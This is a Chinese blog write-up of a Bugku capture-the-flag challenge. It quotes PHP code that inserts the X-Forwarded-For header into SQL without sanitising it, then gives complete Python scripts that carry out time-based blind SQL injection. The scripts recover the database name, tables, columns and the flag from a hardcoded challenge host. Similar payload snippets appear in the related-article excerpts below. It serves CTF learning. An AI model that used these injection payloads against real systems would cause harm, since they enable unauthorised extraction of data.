bugku INSERT INTO

最新推荐文章于 2020-09-09 16:04:37 发布
最新推荐文章于 2020-09-09 16:04:37 发布
阅读量213 收藏
点赞数 1
分类专栏: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zyl_wjl_1413/article/details/84202671
版权

时间盲注典例

思路

1、分析给出的源码,找出注入点

error_reporting(0);

function getIp(){
$ip = '';
if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){
$ip = $_SERVER['HTTP_X_FORWARDED_FOR'];
}else{
$ip = $_SERVER['REMOTE_ADDR'];
}
$ip_arr = explode(',', $ip);
return $ip_arr[0];

}

$host="localhost";
$user="";
$pass="";
$db="";

$connect = mysql_connect($host, $user, $pass) or die("Unable to connect");

mysql_select_db($db) or die("Unable to select database");

$ip = getIp();
echo 'your ip is :'.$ip;
$sql="insert into client_ip (ip) values ('$ip')";
mysql_query($sql);

大致意思是,如果X-Forwarded-For为空,就返回REMOTE_ADDR的ip,不为空就返回X_FORWARDED_FOR里的ip,并将这一ip插入到client_ip这一列里。
很明显,注入点就在请求头X-Forwarded-For这里。

2、分析sql注入类型
因为注入点在X-Forwarded-For这里,注入之后只会回显信息,不会有报错提醒,因此,考虑时间盲注。

3、破数据库名

import requests
import sys

url="http://123.206.87.240:8002/web15/"

database_name=''
sql="'+(select case when (substr((select database()) from {0} for 1)='{1}') then sleep(4) else 1 end) and '1'='1"  
 #逐个字母破解数据库名,结尾的and '1'='1缺省得不出正确结果,不晓得为什么,还求大佬指教,{0}、{1}相当于标记了两处变量,用于下面的format语句
for i in range(1,10):  #猜测数据库名在9个字符以内
	print(i)
	for ch in range(32,129):  #通过循环,逐个字母匹配
		if ch==128:
			sys.exit(0)  #如果一直没匹配上就退出循环,主要是以防万一,不加也没关系
		header={'X-Forwarded-For':sql.format(i,chr(ch))}  
#format()--输入:一个sql的字符串,格式任意或者比较乱   输出:一个相对有规则(缩进、换行)的sql-format的字符串
  这里主要用来实现变量替换
		try:
			ans=requests.get(url,headers=header,timeout=3)
		except:
			database_name+=chr(ch)
			print(database_name)
			break  # 匹配到正确字符就跳出循环

结果:
在这里插入图片描述

4、破表名
几个破解思路都一样,只有sql不同

	import requests
	import sys

	url="http://123.206.87.240:8002/web15/"

	table_name=''
	sql="'+(select case when (substr((select group_concat(table_name) from information_schema.tables where table_schema=database()) from {0} for 1)='{1}') then sleep(4) else 1 end) and '1'='1"
	for i in range(1,20):
		print(i)
		for ch in range(32,129):
			header={'X-Forwarded-For':sql.format(i,chr(ch))}
			try:
				ans=requests.get(url,headers=header,timeout=3)
			except:
				table_name+=chr(ch)
				print(table_name)
				break

结果:
在这里插入图片描述
当i=10时,是一个逗号,但是逗号被省略了(源码可知)

5、破字段名

	column_name=''
	sql="'+(select case when(substr((select group_concat(column_name) from information_schema.columns where table_name='flag') from {0} for 1)='{1}') then sleep(4) else 1 end) and '1'='1"
	for i in range(1,10):
		print(i)
		for ch in range(32,129):
			if ch==128:
				sys.exit(0)
			header={'X-Forwarded-For':sql.format(i,chr(ch))}
			try:
				ans=requests.get(url,headers=header,timeout=3)
			except:
				column_name+=chr(ch)
				print(column_name)
				break

结果:
在这里插入图片描述
6、破flag

	flag=''
	sql="'+(select case when (substr((select flag from flag) from {0} for 1)='{1}') then sleep(4) else 1 end) and '1'='1"
	for i in range(1,34):
		print(str(i))
		for ch in range(32,129):
			if ch==128:
				sys.exit(0)
			sqli=sql.format(i,chr(ch))
			print(sqli)
			header={'X-Forwarded-For':sqli}
			try:
				html=requests.get(url,headers=header,timeout=3)
			except:
				flag+=chr(ch)
				print(flag)
				break

结果太长了,就不放图了

新姿势

1、sql时间盲注(终于完整的解了一次)
2、python小知识

#Super Pig
关注
专栏目录
BUGKu中的Insert注入
Mikasa
03-28 661
这道题因为是先输出的IP的信息,然后再将IP存入了数据库中,并且关闭了所有的报错提示。 因此用时间注入的方式比较好 首先我们先认识一个新的Python中的time模块,time.time()返回当前的时间,只要我们在发送数据包之前以及收到返回包之后各设置一个,就可以通过判断两时间之差确认我们判断的字符!!!! 其实没有什么难的,有相对好点的其他语言基础,相信能很快写出来 当然这道题还不是简单的时...
bugku INSERT INTO注入(基于时间的盲注,详细教程)
wssmiss的博客
07-22 1474
题目 链接地址:http://123.206.87.240:8002/web15/ 分析 打开页面后: 分析页面的php代码 通过源码分析,注入点在x-forwarded-for:client,proxy1,proxy2的clienr处。获取用户ip,并把ip插入到client_ip表中的ip列中 因为源码第一行,关闭了错误报告,所以没有回显。在此采取基于时间的盲注 ...
bugku web题INSERT INTO注入.docx
05-16
bugku web题INSERT INTO注入 明确注入点,是走的http报头的x-forwarded-for。   我尝试了bool型注入,发现自己构造的语句在自己数据库中会报错,但是这里并没有错误报告,因此考虑基于时间的盲注
bugkuINSERT INTO注入解答
Just for funnnnnnnnnnnn
01-10 2216
本来不打算单独的ctf题目成文,但是这个题写payload快看花我的眼睛了,不写一篇记录一下代码对不住我的眼睛。 error_reporting(0); function getIp(){ $ip = ''; if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){ $ip = $_SERVER['HTTP_X_FORWARDED_FOR']; }else{ $i...
CTF之Bugku insert into注入
weixin_41607190的博客
01-07 385
原理:x-forwared-for注入,时间盲注,insert注入 点开网址就是这么一句话,源码也给出 function getIp(){ $ip = ''; if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){ $ip = $_SERVER['HTTP_X_FORWARDED_FOR']; #从x-forwared-for获取ip }else{ $ip =...
bugku------INSERT INTO 注入
bylfsj的博客
09-30 492
原创 bugku-Web-INSERT INTO注入(case注入技巧(逗号被过滤的延迟盲注)+延迟注入脚本) ...
Bugku INSERT-INTO注入
ChanCherry的博客
11-20 212
error_reporting(0); function getIp(){ $ip = ''; if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){ $ip = $_SERVER['HTTP_X_FORWARDED_FOR']; }else{ $ip = $_SERVER['REMOTE_ADDR']; } $ip_arr = explode(',', $ip...
bugku web——INSERT INTO注入
xiaoduanDDG的博客
08-13 243
bugku web——INSERT INTO注入 最爱的代码审计来 初步判断存在sql注入(请求头) 并且过滤了逗号 抓包试了一下,网页上没有回显点,所以是基于时间的盲注() 正常时间盲注用这种格式来完成 if(exp1,exp2,exp3) 但是代码中explode()函数已经将逗号过滤掉了 所以采用这种格式:case when exp1 then sleep(1) else end 来绕过逗号的过滤 exp1中字符串截取subtr1(str,1,1)又存在逗号,于是这里用substr (str) f
bugku-Web-INSERT INTO注入(case注入技巧(逗号被过滤的延迟盲注)+延迟注入脚本)
Sea_Sand息禅
03-31 1379
flag格式:flag{xxxxxxxxxxxx} 不如写个Python吧 error_reporting(0); function getIp(){ $ip = ''; if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){ $ip = $_SERVER['HTTP_X_FORWARDED_FOR']; }else{ $ip = $_SERVER['REM...
Bugku:web INSERT INTO注入
qq_26961571的博客
09-09 218
打开之后, ​ 发现了一串代码,而这串代码就是php。一看这么多,我其实还是很有畏难情绪的,感觉脑壳都大了。但是怎么办,还是得硬上啊!!都已经啃到这里了,现在放弃也太可惜了吧其实最近思虑很多,感觉没有未来。每次都说那能怎么办呢??是啊,能怎么办呢?只能尽全力去想去做,但是真的好累。我又是缺乏安全感的人,要通过自己的努力调节情绪,已经不止一次想过要放弃了,放弃是多么简单的事情,比鼓起勇气的死亡还要简单的多。 回到正题,仔细分析一下代码。 error_reporting(0);​funct..
bugku-INSERT INTO注入(附代码) 详细
偷一个月亮
06-19 678
# -*-coding:utf-8-*- # author : wen # flag:wen{b7bb30b3435f2e7c418b131f9e789f81} import requests import time url = 'http://123.206.87.240:8002/web15/' payload = 'abcdefghigklmnopqrstuvwxyzABCDEFGHI...
bugku-INSERT INTO注入(XFF时间注入) writeup
xuchen16的博客
09-30 6279
网址:http://120.24.86.145:8002/web15/ 题目给了源码 error_reporting(0); function getIp(){ $ip = ''; if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){ $ip = $_SERVER['HTTP_X_FORWARDED_FOR']; }else{ $ip = ...
SQL注入(三)#sql注入 bugku
pumpkin9
04-12 1180
宽字节注入 原理:mysql 在使用 GBK 编码的时候,会认为两个字符为一个汉字,例如%aa%5c 就是一个 汉字(前一个 ascii码大于 128 才能到汉字的范围)。我们在过滤 ’ 的时候,往往利用的思 路是将 ‘ 转换为 \’ (转换的函数或者思路会在每一关遇到的时候介绍)。 因此我们在此想办法将 ‘ 前面添加的 \ 除掉,一般有两种思路: 1、%df 吃掉 \ 具体的原因是 urlen...
bugku中的多次题目以及学到的异或注入
mylyylmy的博客
08-01 3182
首先我们判断一下是什么注入类型 注意输入的是英文字符',中文不会转变为%27,报错,说明是字符注入 这时候我们就要判断一下SQL网站过滤了什么内容,我们可以使用异或注入来判断哪些字符串被过滤掉了 http://120.24.86.145:9004/1ndex.php?id=1%27^(0)%23 正常运行,我们在输入 http://120.24.86.145:9004/1nde...
Bugku-INSERT INTO 注入
苟有恒,必有三更眠,五更起。
07-08 970
INSERT INTO 注入 原题链接 http://120.24.86.145:8002/web15/ 分析 题目给出源码 <?php error_reporting(0); function getIp(){ $ip = ''; if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){ $ip = $_SERVE...
Bugku的SQL注入合集
j7ur8
06-22 2220
直接挂脚本:#!usr/bin/python # -*- coding: utf-8 -*- import string import requests string=string.ascii_letters+string.digits url="http://120.24.86.145:8002/web15/" playload="'+(select case when (substring((...
bugku ctf文件包含 writeup
l3oog1e的博客
05-25 6353
打开题目,直接显示代码<?php include "flag.php"; $a = @$_REQUEST['hello']; eval( "var_dump($a);"); show_source(__FILE__); ?>看到Request函数,很明显可以想到文件包含,这里hello是可控的,那么,就可以构造包含语句,?hello=1);show_source('f
ctf bugku wirteup 简单个人信息收集
热门推荐
成长之路
06-23 1万+
简单个人信息收集 一、下载压缩包1.zip。  本来想用爆破的,但是爆破了半个小时没跑出来密码,感觉可能不是爆破,就是试了一下是不是zip伪加密,发现果然是伪加密(不会破解zip伪加密的同学,推荐这篇博客http://blog.csdn.net/pdsu161530247/article/details/73612910,里面有讲解怎么破解zip伪加密)。 二、解开后,打开压缩包
Bugku-闪的好快 60
王嘟嘟的博客
10-06 6484
0x00 这是一道二维码的题目。 保存图片祭出神器StegSolve。 然后Analysis-&amp;gt;Frame Browser。 这里发现是18张图。也就是18张图片。 我拿手机一个挨着一个扫的。 扫出来的结果是SYC{F1aSh-so-f4sT} 但是提交不正确。 最后更改为SYC{F1aSh_so_f4sT} 60分到手 ...
insert INTO
最新发布
03-30
INSERT INTO是一种SQL语句,用于向数据库表中插入新的行或记录。它的语法通常如下所示: INSERT INTO table_name (column1, column2, column3, ...) VALUES (value1, value2, value3, ...); 其中,table_name是要...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值